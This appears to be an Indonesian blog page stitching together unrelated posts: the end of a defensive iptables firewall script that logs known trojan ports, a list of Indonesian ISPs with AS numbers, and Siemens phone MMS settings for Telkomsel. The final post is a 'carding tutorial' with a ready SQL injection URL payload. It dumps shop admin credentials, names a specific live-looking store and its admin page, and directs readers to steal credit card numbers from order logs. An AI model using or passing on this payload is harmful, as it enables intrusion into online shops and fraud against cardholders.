fi
echo Internal IP: $INTIP
## Determine internal netmask
INTMASK="`ifconfig $INTIF | grep Mask | cut -d : -f 4`"
echo Internal Netmask: $INTMASK
## Determine network address of the internal network
INTLAN=$INTIP´/´$INTMASK
echo Internal LAN: $INTLAN
echo ""
#----Load IPTABLES-modules-----#
#Insert modules- should be done automatically if needed
#If the IRC-modules are available, uncomment them below
echo "Loading IPTABLES modules"
dmesg -n 1 #Kill copyright display on module load
/sbin/modprobe ip_tables
/sbin/modprobe iptable_filter
/sbin/modprobe ip_conntrack
/sbin/modprobe ip_conntrack_ftp
/sbin/modprobe ip_nat_ftp
#/sbin/modprobe ip_conntrack_irc ports=$IRCPORTS
#/sbin/modprobe ip_nat_irc ports=$IRCPORTS
dmesg -n 6
echo " --- "
#----Clear/Reset all chains-----#
#Clear all IPTABLES-chains
#Flush everything, start from scratch
$IPTABLES -F
$IPTABLES -F -t mangle
$IPTABLES -F -t nat
$IPTABLES -X
$IPTABLES -X -t mangle
$IPTABLES -X -t nat
#Set default policies to DROP
$IPTABLES -P INPUT DROP
$IPTABLES -P OUTPUT DROP
$IPTABLES -P FORWARD DROP
#----Set network sysctl options-----#
echo "Setting sysctl options"
#Enable forwarding in kernel
echo 1 > /proc/sys/net/ipv4/ip_forward
#Disabling IP Spoofing attacks.
echo 2 > /proc/sys/net/ipv4/conf/all/rp_filter
#Don´t respond to broadcast pings (Smurf-Amplifier-Protection)
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
#Block source routing
echo 0 > /proc/sys/net/ipv4/conf/all/accept_source_route
#Kill timestamps
echo 0 > /proc/sys/net/ipv4/tcp_timestamps
#Enable SYN Cookies
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
#Kill redirects
echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects
#Enable bad error message protection
echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
#Log martians (packets with impossible addresses)
echo 1 > /proc/sys/net/ipv4/conf/all/log_martians
#Set out local port range
echo "32768 61000" > /proc/sys/net/ipv4/ip_local_port_range
#Reduce DoS´ing ability by reducing timeouts
echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout
echo 2400 > /proc/sys/net/ipv4/tcp_keepalive_time
echo 0 > /proc/sys/net/ipv4/tcp_window_scaling
echo 0 > /proc/sys/net/ipv4/tcp_sack
echo " --- "
echo "Creating user-chains"
#----Create logging chains-----#
##These are the logging-chains. They all have a certain limit of log-entries/sec to prevent logflooding
##The syslog-entries will be fireparse-compatible (see http://www.fireparse.com)
#Invalid packets (not ESTABLISHED,RELATED or NEW)
$IPTABLES -N LINVALID
$IPTABLES -A LINVALID -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --logprefix
"fp=INVALID:1 a=DROP "
$IPTABLES -A LINVALID -j DROP
#TCP-Packets with one ore more bad flags
$IPTABLES -N LBADFLAG
$IPTABLES -A LBADFLAG -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --
log-prefix "fp=BADFLAG:1 a=DROP "
$IPTABLES -A LBADFLAG -j DROP
#Logging of connection attempts on special ports (Trojan portscans, special services, etc.)
$IPTABLES -N LSPECIALPORT
$IPTABLES -A LSPECIALPORT -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j
LOG --log-prefix "fp=SPECIALPORT:1 a=DROP "
$IPTABLES -A LSPECIALPORT -j DROP
#Logging of possible TCP-SYN-Floods
$IPTABLES -N LSYNFLOOD
$IPTABLES -A LSYNFLOOD -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --
log-prefix "fp=SYNFLOOD:1 a=DROP "
$IPTABLES -A LSYNFLOOD -j DROP
#Logging of possible Ping-Floods
$IPTABLES -N LPINGFLOOD
$IPTABLES -A LPINGFLOOD -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG
--log-prefix "fp=PINGFLOOD:1 a=DROP "
$IPTABLES -A LPINGFLOOD -j DROP
#All other dropped packets
$IPTABLES -N LDROP
$IPTABLES -A LDROP -p tcp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --
log-prefix "fp=TCP:1 a=DROP "
$IPTABLES -A LDROP -p udp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG
--log-prefix "fp=UDP:2 a=DROP "
$IPTABLES -A LDROP -p icmp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG
--log-prefix "fp=ICMP:3 a=DROP "
$IPTABLES -A LDROP -f -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --logprefix
"fp=FRAGMENT:4 a=DROP "
$IPTABLES -A LDROP -j DROP
#All other rejected packets
$IPTABLES -N LREJECT
$IPTABLES -A LREJECT -p tcp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG
--log-prefix "fp=TCP:1 a=REJECT "
$IPTABLES -A LREJECT -p udp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j
LOG --log-prefix "fp=UDP:2 a=REJECT "
$IPTABLES -A LREJECT -p icmp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j
LOG --log-prefix "fp=ICMP:3 a=REJECT "
$IPTABLES -A LREJECT -f -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --
log-prefix "fp=FRAGMENT:4 a=REJECT "
$IPTABLES -A LREJECT -p tcp -j REJECT --reject-with tcp-reset
$IPTABLES -A LREJECT -p udp -j REJECT --reject-with icmp-port-unreachable
$IPTABLES -A LREJECT -j REJECT
#----Create Accept-Chains-----#
#TCPACCEPT - Check for SYN-Floods before letting TCP-Packets in
$IPTABLES -N TCPACCEPT
$IPTABLES -A TCPACCEPT -p tcp --syn -m limit --limit $TCPSYNLIMIT --limit-burst
$TCPSYNLIMITBURST -j ACCEPT
$IPTABLES -A TCPACCEPT -p tcp --syn -j LSYNFLOOD
$IPTABLES -A TCPACCEPT -p tcp ! --syn -j ACCEPT
#----Create special User-Chains-----#
#CHECKBADFLAG - Kill any Inbound/Outbound TCP-Packets with impossible flag-combinations
(Some port-scanners use these, eg. nmap Xmas,Null,etc.-scan)
$IPTABLES -N CHECKBADFLAG
$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL FIN,URG,PSH -j LBADFLAG
$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j LBADFLAG
$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL ALL -j LBADFLAG
$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL NONE -j LBADFLAG
$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags SYN,RST SYN,RST -j LBADFLAG
$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags SYN,FIN SYN,FIN -j LBADFLAG
#FILTERING FOR SPECIAL PORTS
#Inbound/Outbound SILENTDROPS/REJECTS (Things we don´t want in our Logs)
#SMB-Traffic
$IPTABLES -N SMB
$IPTABLES -A SMB -p tcp --dport 137 -j DROP
$IPTABLES -A SMB -p tcp --dport 138 -j DROP
$IPTABLES -A SMB -p tcp --dport 139 -j DROP
$IPTABLES -A SMB -p tcp --dport 445 -j DROP
$IPTABLES -A SMB -p udp --dport 137 -j DROP
$IPTABLES -A SMB -p udp --dport 138 -j DROP
$IPTABLES -A SMB -p udp --dport 139 -j DROP
$IPTABLES -A SMB -p udp --dport 445 -j DROP
$IPTABLES -A SMB -p tcp --sport 137 -j DROP
$IPTABLES -A SMB -p tcp --sport 138 -j DROP
$IPTABLES -A SMB -p tcp --sport 139 -j DROP
$IPTABLES -A SMB -p tcp --sport 445 -j DROP
$IPTABLES -A SMB -p udp --sport 137 -j DROP
$IPTABLES -A SMB -p udp --sport 138 -j DROP
$IPTABLES -A SMB -p udp --sport 139 -j DROP
$IPTABLES -A SMB -p udp --sport 445 -j DROP
#Inbound Special Ports
$IPTABLES -N SPECIALPORTS
#Deepthroat Scan
$IPTABLES -A SPECIALPORTS -p tcp --dport 6670 -j LSPECIALPORT
#Subseven Scan
$IPTABLES -A SPECIALPORTS -p tcp --dport 1243 -j LSPECIALPORT
$IPTABLES -A SPECIALPORTS -p udp --dport 1243 -j LSPECIALPORT
$IPTABLES -A SPECIALPORTS -p tcp --dport 27374 -j LSPECIALPORT
$IPTABLES -A SPECIALPORTS -p udp --dport 27374 -j LSPECIALPORT
$IPTABLES -A SPECIALPORTS -p tcp --dport 6711:6713 -j LSPECIALPORT
#Netbus Scan
$IPTABLES -A SPECIALPORTS -p tcp --dport 12345:12346 -j LSPECIALPORT
$IPTABLES -A SPECIALPORTS -p tcp --dport 20034 -j LSPECIALPORT
#Back Orifice scan
$IPTABLES -A SPECIALPORTS -p udp --dport 31337:31338 -j LSPECIALPORT
#X-Win
$IPTABLES -A SPECIALPORTS -p tcp --dport $XWINPORTS -j LSPECIALPORT
#Hack´a´Tack 2000
$IPTABLES -A SPECIALPORTS -p udp --dport 28431 -j LSPECIALPORT
#ICMP/TRACEROUTE FILTERING
#Inbound ICMP/Traceroute
$IPTABLES -N ICMPINBOUND
#Ping Flood protection. Accept $PINGLIMIT echo-requests/sec, rest will be logged/dropped
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type echo-request -m limit --limit $PINGLIMIT --
limit-burst $PINGLIMITBURST -j ACCEPT
#
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type echo-request -j LPINGFLOOD
#Block ICMP-Redirects (Should already be catched by sysctl-options, if enabled)
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type redirect -j LDROP
#Block ICMP-Timestamp (Should already be catched by sysctl-options, if enabled)
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type timestamp-request -j LDROP
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type timestamp-reply -j LDROP
#Block ICMP-address-mask (can help to prevent OS-fingerprinting)
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type address-mask-request -j LDROP
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type address-mask-reply -j LDROP
#Allow all other ICMP in
$IPTABLES -A ICMPINBOUND -p icmp -j ACCEPT
#Outbound ICMP/Traceroute
$IPTABLES -N ICMPOUTBOUND
#Block ICMP-Redirects (Should already be catched by sysctl-options, if enabled)
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type redirect -j LDROP
#Block ICMP-TTL-Expired
#MS Traceroute (MS uses ICMP instead of UDp for tracert)
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type ttl-zero-during-transit -j LDROP
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type ttl-zero-during-reassembly -j LDROP
#Block ICMP-Parameter-Problem
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type parameter-problem -j LDROP
#Block ICMP-Timestamp (Should already be catched by sysctl-options, if enabled)
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type timestamp-request -j LDROP
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type timestamp-reply -j LDROP
#Block ICMP-address-mask (can help to prevent OS-fingerprinting)
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type address-mask-request -j LDROP
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type address-mask-reply -j LDROP
##Accept all other ICMP going out
$IPTABLES -A ICMPOUTBOUND -p icmp -j ACCEPT
#----End User-Chains-----#
echo " --- "
#----Start Ruleset-----#
echo "Implementing firewall rules..."
#################
## INPUT-Chain ## (everything that is addressed to the firewall itself)
#################
##GENERAL Filtering
# Kill INVALID packets (not ESTABLISHED, RELATED or NEW)
$IPTABLES -A INPUT -m state --state INVALID -j LINVALID
# Check TCP-Packets for Bad Flags
$IPTABLES -A INPUT -p tcp -j CHECKBADFLAG
##Packets FROM FIREWALL-BOX ITSELF
#Local IF
$IPTABLES -A INPUT -i lo -j ACCEPT
#
#Kill connections to the local interface from the outside world (--> Should be already catched by
kernel/rp_filter)
$IPTABLES -A INPUT -d 127.0.0.0/8 -j LREJECT
##Packets FROM INTERNAL NET
##Allow unlimited traffic from internal network using legit addresses to firewall-box
##If protection from the internal interface is needed, alter it
$IPTABLES -A INPUT -i $INTIF -s $INTLAN -j ACCEPT
#Kill anything from outside claiming to be from internal network (Address-Spoofing --> Should be
already catched by rp_filter)
$IPTABLES -A INPUT -s $INTLAN -j LREJECT
##Packets FROM EXTERNAL NET
##ICMP & Traceroute filtering
#Filter ICMP
$IPTABLES -A INPUT -i $EXTIF -p icmp -j ICMPINBOUND
#Block UDP-Traceroute
$IPTABLES -A INPUT -p udp --dport 33434:33523 -j LDROP
##Silent Drops/Rejects (Things we don´t want in our logs)
#Drop all SMB-Traffic
$IPTABLES -A INPUT -i $EXTIF -j SMB
#Silently reject Ident (Don´t DROP ident, because of possible delays when establishing an
outbound connection)
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 113 -j REJECT --reject-with tcp-reset
##Public services running ON FIREWALL-BOX (comment out to activate):
# ftp-data
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 20 -j TCPACCEPT
# ftp
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 21 -j TCPACCEPT
# ssh
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 22 -j TCPACCEPT
#telnet
#$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 23 -j TCPACCEPT
# smtp
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 25 -j TCPACCEPT
# DNS
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 53 -j TCPACCEPT
$IPTABLES -A INPUT -i $EXTIF -p udp --dport 53 -j ACCEPT
# http
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 80 -j TCPACCEPT
# https
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 443 -j TCPACCEPT
# POP-3
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 110 -j TCPACCEPT
#SQUID
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 3128 -j TCPACCEPT
$IPTABLES -t nat -A PREROUTING -i $EXTIF -p tcp --dport 80 -j REDIRECT --to-port 3128
##Separate logging of special portscans/connection attempts
$IPTABLES -A INPUT -i $EXTIF -j SPECIALPORTS
##Allow ESTABLISHED/RELATED connections in
$IPTABLES -A INPUT -i $EXTIF -m state --state ESTABLISHED -j ACCEPT
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport $UNPRIVPORTS -m state --state RELATED -j
TCPACCEPT
$IPTABLES -A INPUT -i $EXTIF -p udp --dport $UNPRIVPORTS -m state --state RELATED -j
ACCEPT
##Catch all rule
$IPTABLES -A INPUT -j LDROP
##################
## Output-Chain ## (everything that comes directly from the Firewall-Box)
##################
##Packets TO FIREWALL-BOX ITSELF
#Local IF
$IPTABLES -A OUTPUT -o lo -j ACCEPT
##Packets TO INTERNAL NET
#Allow unlimited traffic to internal network using legit addresses
$IPTABLES -A OUTPUT -o $INTIF -d $INTLAN -j ACCEPT
##Packets TO EXTERNAL NET
##ICMP & Traceroute
$IPTABLES -A OUTPUT -o $EXTIF -p icmp -j ICMPOUTBOUND
##Silent Drops/Rejects (Things we don´t want in our logs)
#SMB
$IPTABLES -A OUTPUT -o $EXTIF -j SMB
#Ident
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 113 -j REJECT --reject-with tcp-reset
##Public services running ON FIREWALL-BOX (comment out to activate):
# ftp-data
#$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 20 -j ACCEPT
# ftp
#$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 21 -j ACCEPT
# ssh
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
#telnet
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 23 -m state --state ESTABLISHED -j ACCEPT
# smtp
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 25 -m state --state ESTABLISHED -j ACCEPT
# DNS
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 53 -j ACCEPT
$IPTABLES -A OUTPUT -o $EXTIF -p udp --sport 53 -j ACCEPT
# http
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
# https
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT
# POP-3
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 110 -m state --state ESTABLISHED -j ACCEPT
# Squid
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 3128 -m state --state ESTABLISHED -j
ACCEPT
##Accept all tcp/udp traffic on unprivileged ports going out
$IPTABLES -A OUTPUT -o $EXTIF -s $EXTIP -p tcp --sport $UNPRIVPORTS -j ACCEPT
$IPTABLES -A OUTPUT -o $EXTIF -s $EXTIP -p udp --sport $UNPRIVPORTS -j ACCEPT
##Catch all rule
$IPTABLES -A OUTPUT -j LDROP
####################
## FORWARD-Chain ## (everything that passes the firewall)
####################
##GENERAL Filtering
#Kill invalid packets (not ESTABLISHED, RELATED or NEW)
$IPTABLES -A FORWARD -m state --state INVALID -j LINVALID
# Check TCP-Packets for Bad Flags
$IPTABLES -A FORWARD -p tcp -j CHECKBADFLAG
##Filtering FROM INTERNAL NET
##Silent Drops/Rejects (Things we don´t want in our logs)
#SMB
$IPTABLES -A FORWARD -o $EXTIF -j SMB
##Special Drops/Rejects
# - To be done -
##Filter for some Trojans communicating to outside
# - To be done -
##Port-Forwarding from Ports < 1024 [outbound] (--> Also see chain PREROUTING)
#HTTP-Forwarding
#$IPTABLES -A FORWARD -o $EXTIF -s $HTTPIP -p tcp --sport 80 -j ACCEPT
##Allow all other forwarding (from Ports > 1024) from Internal Net to External Net
$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p tcp --sport $UNPRIVPORTS -j
ACCEPT
$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p udp --sport $UNPRIVPORTS -j
ACCEPT
$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p icmp -j ACCEPT
##Filtering FROM EXTERNAL NET
##Silent Drops/Rejects (Things we don´t want in our logs)
#SMB
$IPTABLES -A FORWARD -i $EXTIF -j SMB
##Allow replies coming in
$IPTABLES -A FORWARD -i $EXTIF -m state --state ESTABLISHED -j ACCEPT
$IPTABLES -A FORWARD -i $EXTIF -p tcp --dport $UNPRIVPORTS -m state --state RELATED
-j TCPACCEPT
$IPTABLES -A FORWARD -i $EXTIF -p udp --dport $UNPRIVPORTS -m state --state RELATED
-j ACCEPT
$IPTABLES -A FORWARD -i $EXTIF -p icmp -m state --state RELATED -j ACCEPT
##Port-Forwarding [inbound] (--> Also see chain PREROUTING)
#HTTP-Forwarding
#$IPTABLES -A FORWARD -i $EXTIF -p tcp -d $HTTPIP --dport 80 -j ACCEPT
#Battlecom-Forwarding
#$IPTABLES -A FORWARD -p tcp --dport 2300:2400 -i $EXTIF -d $BATTLECOMIP -j ACCEPT
#$IPTABLES -A FORWARD -p udp --dport 2300:2400 -i $EXTIF -d $BATTLECOMIP -j ACCEPT
#$IPTABLES -A FORWARD -p tcp --dport 47624 -i $EXTIF -d $BATTLECOMIP -j ACCEPT
##Catch all rule/Deny every other forwarding
$IPTABLES -A FORWARD -j LDROP
################
## PREROUTING ##
################
##Port-Forwarding (--> Also see chain FORWARD)
##HTTP
#$IPTABLES -A PREROUTING -t nat -i $EXTIF -p tcp -d $EXTIP --dport 80 -j DNAT --to
$HTTPIP
##Battlecom
#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p tcp --destination-port 2300:2400 -i $EXTIF -j
DNAT --to $BATTLECOMIP
#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p udp --destination-port 2300:2400 -i $EXTIF -j
DNAT --to $BATTLECOMIP
#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p tcp --destination-port 47624 -i $EXTIF -j
DNAT --to $BATTLECOMIP:47624
###################
## POSTROUTING ##
###################
#Masquerade from Internal Net to External Net
$IPTABLES -A POSTROUTING -t nat -o $EXTIF -j MASQUERADE
#------End Ruleset------#
echo "...done"
echo ""
echo "--> IPTABLES firewall loaded/activated <--"
##--------------------------------End Firewall---------------------------------##
;;
*)
echo "Usage: firewall (start|stop|restart|status) EXTIF INTIF"
exit 1
esac
exit 0
Menu tambahan
#############
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 3128
IDC (Cyber Building) IIX-JKT2 GCC (Telkom Building) IIX-JKT1
ISP AS Number Connection ISP AS Number Connection
- Jasatel AS 9785 FastEther - AccessNet AS 7587 Ethernet
- Starcall AS 9251 FastEther - RadNet AS 4434 Ethernet
- Nusanet AS 23679 FastEther - Centrin AS 9326 Ethernet
- Thamrin AS 23952 FastEther - Mahatel AS 7083 Ethernet
- Mitranet AS 23691 FastEther - Idola AS 4800 Ethernet
- IconPLN AS 9341 FastEther
- VIPnet AS 23698 FastEther Napinfo (Kuningan) IIX-JKT3
- Napsindo AS 17907 FastEther ISP AS Number Connection
- The.Net AS 10208 FastEther - Napinfo AS 17727 FastEther
- Gen.ID AS 23950 FastEther - Inter.net AS 18103 FastEther
- GerbangNet AS 18251 FastEther - Asianet AS 10114 FastEther
- Elga AS 23695 FastEther - Orbicom AS 23948 FastEther
- FirstAsia AS 23696 FastEther - Radnet AS 4434 FastEther
- EzyNet AS 18056 FastEther
- BNA AS 18189 FastEther
- TripleGate AS 17910 FastEther
- CSM AS 18379 FastEther
- Padinet AS 23756 FastEther
- Reach AS 4637 FastEther
- Uninet AS 17884 FastEther
- SatNet AS 17826 FastEther
- Multidata AS 18153 FastEther
- Melsa.net AS 9657 FastEther
- KSNet AS 18112 FastEther
- JavaNet AS 18393 FastEther
- IptekNet AS 3583 FastEther
- SpeedNet AS 9251 FastEther
- Patrakom AS 10137 FastEther
- Angkasa AS17450 FastEther
- Solusi AS 17995 FastEther
- GPNet AS 18394 FastEther
- SpotNet AS 4833 FastEther
- Jogjamedianet AS 23671 FastEther
- IPnet AS 18347 FastEther
- Rainbow AS 23945 FastEther
- Central AS 9228 FastEther
- Exelcom AS17885 FastEther
- UIInet AS 17996 FastEther
- BizNet AS 17451 FastEther
- Indika AS 23694 FastEther
- Quasar AS 18364 FastEther
- Eranet AS 17440 FastEther
- Easynet AS 23651 FastEther
- TopNet AS 23946 FastEther
- LinkNet AS 9905 FastEther
- InfoAsia AS 10220 FastEther
- Indonet AS 9340 FastEther
- CBN AS 4787 FastEther
- Indosat AS 4795 FastEther
- Visionnet AS 18237 FastEther
- Dnet AS 9794 FastEther
- Idola AS 4800 FastEther
- KadinNet Static FastEther
- Jalawave AS 23697 FastEther
- PSN AS 9875 FastEther
- Jetscom AS17671 FastEther
- Infokom AS17670 FastEther
- Bolehnet AS 9462 FastEther
- DTP AS18059 FastEther
- Kabelvision AS 23700 FastEther
- NTT Indonesia AS 10217 FastEther
- Satelindo AS 17922 FastEther
- Okenet AS 4832 FastEther
- TelkomNet AS 17974 FastEther
- PacificNet AS 4855 FastEther
- Infonet AS 2008 FastEther
- Asiakomnet AS 18052 FastEther
- Commercenet Static FastEther
- JII AS 17800 FastEther
- NAP Info AS 17727 FastEther
- AsiaNet AS 10114 FastEther
- Inter.net AS 18103 FastEther
- CityNet AS 17769 FastEther
- Radnet AS 4434 FastEther
- Centrin AS 9326 FastEther
- Bitnet AS 18156 FastEther
- IPTK AS 23699 FastEther
- Telkomsel AS 23693 FastEther
- Estiko AS 23692 Serial
- Qita Static Serial
- Sistelindo AS 2687 Serial
- PrimaNet AS 17658 Serial
- Internux Static Serial
- Teras AS 4821 Serial
- Circlecom AS 17538 Serial
Post by : No_Name on [ 26 October 2005 07:57:07 ]
Setting GPRS
Setting manual MMS via GPRS Telkomsel
Setting manual MMS via GPRS Telkomsel untuk Siemens A65, CF62, C60, M55, MC60, S55,
SL55
Langkah 1: Membuat Setting GPRS
1. Tekan Menu
2. Pilih Setup
3. Pilih Connectivity
4. Pilih GPRS lalu berikan tanda √
5. Pilih Data Services
6. Pilih MMS , WAP
7. Pilih
7a. Mengganti nama:
- Tekan Option
- Tekan Rename
- Masukkan : MMS Telkomsel
- Tekan Save
7b. Tekan Edit lalu Tekan Yes
8. Pilih GPRS Settings
8a. Berikan tanda √ pada GPRS Settings
8b. Pilih Edit
9. Isilah parameter sebagai berikut:
- APN : mms
- Login : wap
- Password : wap123
10. Tekan Save
11. Lanjutkan ke langkah 2
Langkah 2 : Setting MMS
1. Tekan Menu
2. Pilih Message
3. Pilih Msg. setup
4. Pilih MMS profiles
5. Pilih MMS atau tempat lainnya.
5a. Mengganti nama :
- Tekan Options
- Tekan Rename
- Masukkan : MMS Telkomsel
- Tekan OK
5b. Tekan Options, Tekan Change sett.
6. Isilah parameter sebagai berikut:
- Expiry time : Maximum
- Def. Priority : Normal
- Def. duration : 010.0
- Retrieval : Automatic
- MMS Relaysrv. : http://mms.telkomsel.com
- IP Settings : 010.001.089.150
Port : 9201
2 nd port dan 2 nd address tidak perlu diisi
- Conn. profile : Pilih MMS Telkomsel
7. Selesai
Post by : Siemens on [ 24 October 2005 11:23:47 ]
tutorial carding
Tutorial Carding by god_army
Disini saya mau berbagi sedikit tentang tutorial seputar carding yang mana menggunakan script
yang mengexploitasi terhadap web yang masih vuln terhadap script yang saya buat.
Sebenarnya script itu masih bisa di modifikasi lagi yah sesuai kebutuhan aza tapi itu terserah
saudara ... hehe..hehe.
Langkah yang pertama ialah mencari target web yang mau kita test vuln apa enggaxnya, kita cari
di cari di google dengan keyword :
/shop/shopdisplayproducts.asp atau
shopdisplayproducts.asp
Kalo dah dapet web yang dah mau dijadiin target terus kita coba pake script ini --> ?cat=´%
20and%201=convert(int,(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%
20tbluser))--sp_password
Misalnya kita dapet target www.masih-vuln.com/shopdisplayproducts.asp?weleh=uhui
Terus kita masukin deh script tadi dibelakang shopdisplayproducts.asp jadinya kayak gini deh :
www.masih-vuln.com/shopdisplayproducts.asp?cat=´%20and%201=convert(int,(select%20top%
201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))--sp_password
Der apa yang terjadi ...? Kok gx ada yang terjadi malahan keluar
The page cannot be found
The page you are looking for might have been removed, had its name changed, or is temporarily
unavailable.
--------------------------------------------------------------------------------
Kalo ghitu artinya tuh web gx bisa kita kasih script gituan, coba cari yang laen deh.
Kalo webnya masih vuln entar keluar username sama password adminnya, kalo udah dapet kita
tinggal login pake username and password hasil temuan kita tadi.
Sebagai contoh web yang masih vuln adalah :
http://www.ilovesport.com.au jadinya :
http://www.ilovesport.com.au/shop/shopdisplayproducts.asp?cat=´%20and%201=convert(int,
(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))--sp_password
Dan yang keluar malahan username sama password adminnya, abis itu kita tinggal login pake
username ama password tersebut di
http://www.ilovesport.com.au/shop/admin.asp
hehehehe ... heheheheh
berhasil khan ....
abis itu masuk ke order lognya terus lo cari deh cartu creditnya disana.
0 komentar:
Posting Komentar